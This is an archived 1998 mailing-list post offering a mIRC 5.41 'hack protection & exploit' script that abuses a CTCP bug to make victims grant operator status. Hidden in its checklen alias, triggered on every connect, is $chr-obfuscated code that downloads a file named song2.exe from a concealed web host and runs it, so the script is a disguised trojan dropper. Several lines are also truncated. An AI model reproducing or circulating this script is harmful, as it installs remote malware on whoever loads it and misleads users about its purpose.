(no subject)

From: System Administrator (rootat_private)
Date: Fri Nov 13 1998 - 11:50:32 PST

Next message: knarphat_private-CORP.COM: "Re: Old IRC Client bug Re-Applied"

Previous message: Casper Dik: "Re: [Fwd: NOTE: Solaris 7 gotcha for some ultras]"
Next in thread: Cacaio Torquato: "(no subject)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,
while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been
notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.

cya,
    fs

--- cut here ---

;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private>
;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;
;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
;#;   if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick
    .halt
  }
}

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
    .halt
  }
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
    .halt
  }
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
    .halt
  }
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$  .sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$  .sockwrite -n protx
}

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test
}

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  }
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  }
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  }
  }
  unset %xinprog
  unset %xfilename
  unset %xlof
  unset %xfirst
}

--- cut here ---

Next message: knarphat_private-CORP.COM: "Re: Old IRC Client bug Re-Applied"
Previous message: Casper Dik: "Re: [Fwd: NOTE: Solaris 7 gotcha for some ultras]"
Next in thread: Cacaio Torquato: "(no subject)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:15 PDT